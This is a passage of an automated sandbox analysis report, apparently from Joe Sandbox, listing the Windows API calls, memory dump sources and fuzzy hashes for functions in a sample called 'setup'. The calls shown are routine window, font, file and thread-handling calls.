                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00C2526E
                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,00000001), ref: 00C252C3
                                                                                                                            • Part of subcall function 00C2538C: EnumChildWindows.USER32(?,00C253C3,?), ref: 00C253B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$CapsDeviceOffset$ChildClientEnumInvalidateReleaseWindowWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2604121654-0
                                                                                                                          • Opcode ID: 869ed98bacbcc2223dac3a4691d771d536057b417ac584255f2cbcf98771367d
                                                                                                                          • Instruction ID: a3fa6c2b70f062f9b30d3df13a611d7397b2307229192db027a9c8ba88624bf9
                                                                                                                          • Opcode Fuzzy Hash: 869ed98bacbcc2223dac3a4691d771d536057b417ac584255f2cbcf98771367d
                                                                                                                          • Instruction Fuzzy Hash: 77514AB1A00619EFDB14CFA8D999FBFBBB5FF48304F104119E556A7690DB71AA00CB20
                                                                                                                          Function 00C3A1E2 Relevance: 9.1, APIs: 6, Instructions: 116networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C3A1EC
                                                                                                                            • Part of subcall function 00C3E41C: __EH_prolog3_catch.LIBCMT ref: 00C3E423
                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00C3A231
                                                                                                                          • WSACleanup.WS2_32 ref: 00C3A280
                                                                                                                          • WSASetLastError.WS2_32(0000276C), ref: 00C3A28B
                                                                                                                          • WSACleanup.WS2_32 ref: 00C3A32B
                                                                                                                          • FreeLibrary.KERNEL32(?,00C3A346,?,00C3A346,00000198,00C19C45,00000000), ref: 00C3A334
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cleanup$ErrorFreeH_prolog3_H_prolog3_catchLastLibraryStartup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958719020-0
                                                                                                                          • Opcode ID: 5d19d25c8baa5678d3ead6575b5d78804f0ebc5c1a6adfe304e74f32437d93b6
                                                                                                                          • Instruction ID: 896649fb9ab2c7fc67754a03a084723ac2b9e379338205f6f90cf6e9b49cc775
                                                                                                                          • Opcode Fuzzy Hash: 5d19d25c8baa5678d3ead6575b5d78804f0ebc5c1a6adfe304e74f32437d93b6
                                                                                                                          • Instruction Fuzzy Hash: D341F270B217129FEF64AFB1994979E76A0BF00710F008169F09ACB5D1DB75C9A0EB52
                                                                                                                          Function 00C36044 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFocus.USER32 ref: 00C3607F
                                                                                                                            • Part of subcall function 00C2F2AF: UnhookWindowsHookEx.USER32(?), ref: 00C2F2D9
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C360B5
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00C360CD
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00C3616E
                                                                                                                          • IsWindow.USER32(00000000), ref: 00C36175
                                                                                                                          • SetFocus.USER32(00000000,?,00000007,?,00000000), ref: 00C36180
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableFocus$EnabledHookUnhookWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2931672367-0
                                                                                                                          • Opcode ID: 99275d29f6ef4d8c03f08839e849a1f835ac2d5e7794376cfac52d5ec973d777
                                                                                                                          • Instruction ID: 6d4b96af6c6b98d8918c0bc9a29740e909cd37f857b47d26ba48e4b1040832ba
                                                                                                                          • Opcode Fuzzy Hash: 99275d29f6ef4d8c03f08839e849a1f835ac2d5e7794376cfac52d5ec973d777
                                                                                                                          • Instruction Fuzzy Hash: E9419C30710601FFDB09EFA4C899BADBBB5BF45304F058169F0198B2A2CB70A955EB91
                                                                                                                          Function 00C26E1E Relevance: 9.1, APIs: 6, Instructions: 83timefileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB,00000000,00000000), ref: 00C26E3D
                                                                                                                          • GetFileTime.KERNEL32(00000000,?,?,00000000,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00C26E74
                                                                                                                          • CompareFileTime.KERNEL32(?,D53E8000,?,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB), ref: 00C26E8D
                                                                                                                          • CompareFileTime.KERNEL32(?,D53E8000,?,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB), ref: 00C26EAB
                                                                                                                          • CompareFileTime.KERNEL32(00000000,D53E8000,?,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB), ref: 00C26EC9
                                                                                                                          • SetFileTime.KERNEL32(00000000,?,?,00000000,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00C26EF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Time$Compare$Create
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 440986303-0
                                                                                                                          • Opcode ID: 728770ace4bbab7a0f90415b964c130a56de1dc23d4edaa5eef2322ec763bd15
                                                                                                                          • Instruction ID: 292f0289d0512d0b64b62768274e38fc70b7ae7fde576205268d647d00f09f82
                                                                                                                          • Opcode Fuzzy Hash: 728770ace4bbab7a0f90415b964c130a56de1dc23d4edaa5eef2322ec763bd15
                                                                                                                          • Instruction Fuzzy Hash: 42210CB690122DAADF01DBE0E948EEFB7FCAB04744F114126E911E2540E731AF068BB0
                                                                                                                          Function 00C08EA9 Relevance: 9.1, APIs: 6, Instructions: 81fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,00C08FAB,?,?,?), ref: 00C08ECC
                                                                                                                          • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?), ref: 00C08EF8
                                                                                                                          • GetLastError.KERNEL32(?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?,?,00C07E42,?,?,?), ref: 00C08F03
                                                                                                                          • ReadFile.KERNEL32(00000000,?,?,?,00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?), ref: 00C08F19
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?,?,00C07E42,?,?), ref: 00C08F24
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?,?,00C07E42,?,?), ref: 00C08F2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandle$CreateErrorLastPointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2547090176-0
                                                                                                                          • Opcode ID: ac424d796723926d4ce28eccde7d4a3f45d5a31600de32b92f4660c058215f2a
                                                                                                                          • Instruction ID: 908836d3cb23a3c1b0ddaec02293fe98e3a088191c0ef3dc77c185afa25d22bb
                                                                                                                          • Opcode Fuzzy Hash: ac424d796723926d4ce28eccde7d4a3f45d5a31600de32b92f4660c058215f2a
                                                                                                                          • Instruction Fuzzy Hash: EA216B31200205AFDB148FA4DD8AB6E37AAFB55760F008619F562D61E0DB70AE55DA60
                                                                                                                          Function 00C10441 Relevance: 9.1, APIs: 6, Instructions: 79COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1044B
                                                                                                                            • Part of subcall function 00C2CF8A: __EH_prolog3.LIBCMT ref: 00C2CF91
                                                                                                                            • Part of subcall function 00C2CF8A: GetDC.USER32(00000000), ref: 00C2CFBD
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 00C1047B
                                                                                                                          • MulDiv.KERNEL32(?,00000000), ref: 00C1048A
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C104E8
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C104FF
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C1051C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFontIndirect$CapsDeviceH_prolog3H_prolog3_Object
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 130217458-0
                                                                                                                          • Opcode ID: 08e6d45fe23bb862c63f225e7f2a6305ef11049ac10dd32111fe855f69946d6b
                                                                                                                          • Instruction ID: bbb7ca5aaed240a0c37b2c7e89814692ec434b35f6d9a67eeef2b0b38e3112dd
                                                                                                                          • Opcode Fuzzy Hash: 08e6d45fe23bb862c63f225e7f2a6305ef11049ac10dd32111fe855f69946d6b
                                                                                                                          • Instruction Fuzzy Hash: DB31BF70A00259AADF14EFA0CC85BEEB379BF04304F00815AFA19AB191DB745E85EF65
                                                                                                                          Function 00C22662 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C22669
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00C2268B
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C2269F
                                                                                                                            • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3E9
                                                                                                                            • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3F6
                                                                                                                            • Part of subcall function 00C2D092: __EH_prolog3.LIBCMT ref: 00C2D099
                                                                                                                            • Part of subcall function 00C2D092: GetWindowDC.USER32(00000000,00000004,00000000,?,00000058,00C1C274), ref: 00C2D0C5
                                                                                                                            • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6E4
                                                                                                                            • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6F5
                                                                                                                          • GetSysColor.USER32(00000005), ref: 00C226CF
                                                                                                                            • Part of subcall function 00C2D048: __EH_prolog3.LIBCMT ref: 00C2D04F
                                                                                                                            • Part of subcall function 00C2D048: CreatePen.GDI32(?,?,?), ref: 00C2D070
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D822
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D838
                                                                                                                          • Rectangle.GDI32(?,?,?,?,?), ref: 00C2270E
                                                                                                                            • Part of subcall function 00C2D695: RestoreDC.GDI32(?,?), ref: 00C2D6AA
                                                                                                                            • Part of subcall function 00C2D695: RestoreDC.GDI32(?,?), ref: 00C2D6C0
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C22720
                                                                                                                            • Part of subcall function 00C2D1E0: ReleaseDC.USER32(?,00000000), ref: 00C2D214
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientObject$H_prolog3RectRestoreSaveScreenSelectWindow$ColorCreateDeleteH_prolog3_RectangleRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 400067900-0
                                                                                                                          • Opcode ID: abe2c9ce52344f6a9cb13fc73a4aee1d51eb9ca55908bf02825052663b1eb65a
                                                                                                                          • Instruction ID: 57d29d171267f3a1c35077b744564d6bd14b4e019e5d4e72101cb370a6257d3f
                                                                                                                          • Opcode Fuzzy Hash: abe2c9ce52344f6a9cb13fc73a4aee1d51eb9ca55908bf02825052663b1eb65a
                                                                                                                          • Instruction Fuzzy Hash: 76312971D0021DAFDF00EFA4EC89AEDBB79BF24304F104218F812A65A2DB716A45DB10
                                                                                                                          Function 00C2E594 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00C2E5CC
                                                                                                                          • GetParent.USER32(00000000), ref: 00C2E5DA
                                                                                                                          • GetParent.USER32(00000000), ref: 00C2E5F1
                                                                                                                          • GetLastActivePopup.USER32(00000000), ref: 00C2E604
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C2E618
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00C2E62B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 670545878-0
                                                                                                                          • Opcode ID: 80b97d20ebdd357268ee2e88e9d5d9756ed5171ad3d0d1c35a481d7069e7e651
                                                                                                                          • Instruction ID: c61e0c030026c682873b1236e297b2430fff232369c05383bae3d35e42ba640a
                                                                                                                          • Opcode Fuzzy Hash: 80b97d20ebdd357268ee2e88e9d5d9756ed5171ad3d0d1c35a481d7069e7e651
                                                                                                                          • Instruction Fuzzy Hash: AF1108326152359BC7315B55B848B6E73A87F64F68B190136FC15F7B48EB20DE0082D0
                                                                                                                          Function 00C22983 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsWindow.USER32(00000400), ref: 00C229A2
                                                                                                                          • GetFocus.USER32 ref: 00C229C8
                                                                                                                          • GetParent.USER32 ref: 00C229E2
                                                                                                                          • IsWindow.USER32(?), ref: 00C229F7
                                                                                                                          • GetWindowRect.USER32(00000400,?), ref: 00C22A0F
                                                                                                                            • Part of subcall function 00C2D7AA: ScreenToClient.USER32(?,?), ref: 00C2D7B9
                                                                                                                            • Part of subcall function 00C2D7AA: ScreenToClient.USER32(?,00000000), ref: 00C2D7C6
                                                                                                                          • RedrawWindow.USER32(00000400,00000000,00000000,00000501), ref: 00C22A43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ClientScreen$FocusParentRectRedraw
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3242756796-0
                                                                                                                          • Opcode ID: 63d7d8ef49248f61057b55f531a196515441a5669de7c2e8fddd06fa4d1ae694
                                                                                                                          • Instruction ID: a2c081f049ddb41ab1ccba303b504d21d8c0308844681d09f4c637e38fc8c3d0
                                                                                                                          • Opcode Fuzzy Hash: 63d7d8ef49248f61057b55f531a196515441a5669de7c2e8fddd06fa4d1ae694
                                                                                                                          • Instruction Fuzzy Hash: 95219331910715FBDB319B74DC0ABAEBAB9BF04711F11021AF582E29A1EB70D950DB90
                                                                                                                          Function 00C6FD47 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,00C6FD3E,00C6D738,00C47D0D), ref: 00C6FD55
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C6FD63
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C6FD7C
                                                                                                                          • SetLastError.KERNEL32(00000000,00C6FD3E,00C6D738,00C47D0D), ref: 00C6FDCE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: 2398dfca4fe271cdce856242bf517665abb4843f975ea3397568e2d31c37ed08
                                                                                                                          • Instruction ID: ee8935d97d98ad9e948cd6c7c9d95f2c2c8708501b34d14d55ec14297780fee7
                                                                                                                          • Opcode Fuzzy Hash: 2398dfca4fe271cdce856242bf517665abb4843f975ea3397568e2d31c37ed08
                                                                                                                          • Instruction Fuzzy Hash: 6E01843221D311AEE7342AB5BCC5F2E2A5AEB01774730423EF538450E1EF526C466685
                                                                                                                          Function 00C3D58F Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00C3D5A8
                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00C3D5B3
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00C3D5C3
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00C3D5DC
                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00C3D5EC
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00C3D5F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1315500227-0
                                                                                                                          • Opcode ID: 53d5ecfffa1b8abf4f883402728642c97eafcbb20908439d359c6243c34a948b
                                                                                                                          • Instruction ID: cec2c1635ed4c17963d011ecc199d9eb54ea981d0db8fd94f6f10bd6803f4069
                                                                                                                          • Opcode Fuzzy Hash: 53d5ecfffa1b8abf4f883402728642c97eafcbb20908439d359c6243c34a948b
                                                                                                                          • Instruction Fuzzy Hash: E701807190111AABDB11DF649C0CFEE7778AF19318F514226F812EA190DB34DB458BA1
                                                                                                                          Function 00C6CB00 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C6CCB0: TlsAlloc.KERNEL32(00C6CBC5,00C5AF75,00C4E28E,00C59C5C,?,00000000,?,00C59C43,?,?,00000000,00000000,?,00C5504F,00000000,?), ref: 00C6CCCC
                                                                                                                            • Part of subcall function 00C6CCB0: GetCurrentThreadId.KERNEL32 ref: 00C6CCD7
                                                                                                                          • TlsGetValue.KERNEL32(00C5AF84,00C4E28E,00C59C5C,?,00000000,?,00C59C43,?,?,00000000,00000000,?,00C5504F,00000000,?,00000000), ref: 00C6CB0B
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,00000000,00000004), ref: 00C6CB34
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00C6CB3B
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00C6CB42
                                                                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00C6CB49
                                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 00C6CB56
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
